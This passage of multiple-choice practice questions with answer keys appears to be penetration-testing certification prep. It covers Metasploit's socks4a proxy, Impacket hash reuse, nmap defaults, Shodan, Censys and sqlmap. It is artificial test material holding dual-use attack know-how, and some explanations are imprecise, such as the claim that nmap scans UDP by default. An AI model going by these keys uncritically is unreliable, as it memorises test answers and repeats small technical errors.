Explanation: Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.
You are a penetration tester, and you want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use?
A.Impacket
B.Metasploit
C.Responder
D. Wireshark
A.Impacket
Explanation:
Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.
You are a penetration tester, and you want to use nmap to scan a remote system. You will be using the following command: nmap 142.78.32.0/24 How many TCP ports will you be scanning?
A.256
B.1,000
C.1,024
D.65,535
B.1,000
Explanation:
Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1–65,535.
You are writing the following Python code:
if 1 == 1:
print("howdy")
elif 3 == 3:
print("howdy")
else:
print("howdy")
How many times will this code print the word howdy?
A.0
B.1
C.2
D.3
B.1
Explanation:
In this scenario we are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statements.
You are a penetration tester, and you want to do a search to see your client’s computers and devices that are connected to the Internet by using a variety of filters. Which tool can you use to accomplish this?
A.Censys
B.Shodan
C.theHarvester
D.Whois
B.Shodan
Explanation:
Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.
You are a penetration tester, and you want to do a search to see your client’s computers and devices that are connected to the Internet and that will show you the geoIP information, if available. Which tool can you use to accomplish this?
A.Censys
B.Shodan
C.theHarvester
D.Whois
A.Censys
Explanation:
Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.
You are a penetration tester, and you are conducting a test on a specific client database server. You want to detect any vulnerabilities on the database server. Which tool will best assist you?
A.Nessus
B.Nikto
C.Sqlmap
D.OpenVAS
C.Sqlmap
Explanation:
Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.
